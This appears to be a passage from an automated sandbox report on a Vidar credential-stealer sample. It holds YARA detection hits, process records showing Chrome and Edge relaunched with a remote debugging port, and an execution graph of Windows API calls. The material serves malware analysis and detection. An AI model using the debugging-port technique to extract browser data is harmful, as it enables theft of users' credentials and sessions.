• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1613569602.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2504659598.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:false

                                                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                                                      Start time:01:09:15
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                      Imagebase:0xa60000
                                                                                                                                                                                                                                                                                      File size:28'160 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                                      Start time:03:05:06
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                                                                      Start time:03:05:07
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2232,i,13166791472853580665,17998276385387722307,262144 /prefetch:8
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                                                                      Start time:03:05:21
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                                                                      Start time:03:05:21
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2680 --field-trial-handle=2488,i,17259416842961834522,6867803032885323011,262144 /prefetch:3
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                                                                      Start time:03:05:21
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                                                                      Start time:03:05:22
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:3
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:34
Start time:03:05:26
Start date:27/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6520 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8
Imagebase:0x7ff7fb980000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:03:05:26
Start date:27/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8
Imagebase:0x7ff7fb980000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Execution Graph

Execution Coverage:17.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21%
Total number of Nodes:1482
Total number of Limit Nodes:27
4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 
40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 
SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API 
calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 
3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 
405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 
4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 
3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 
CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 
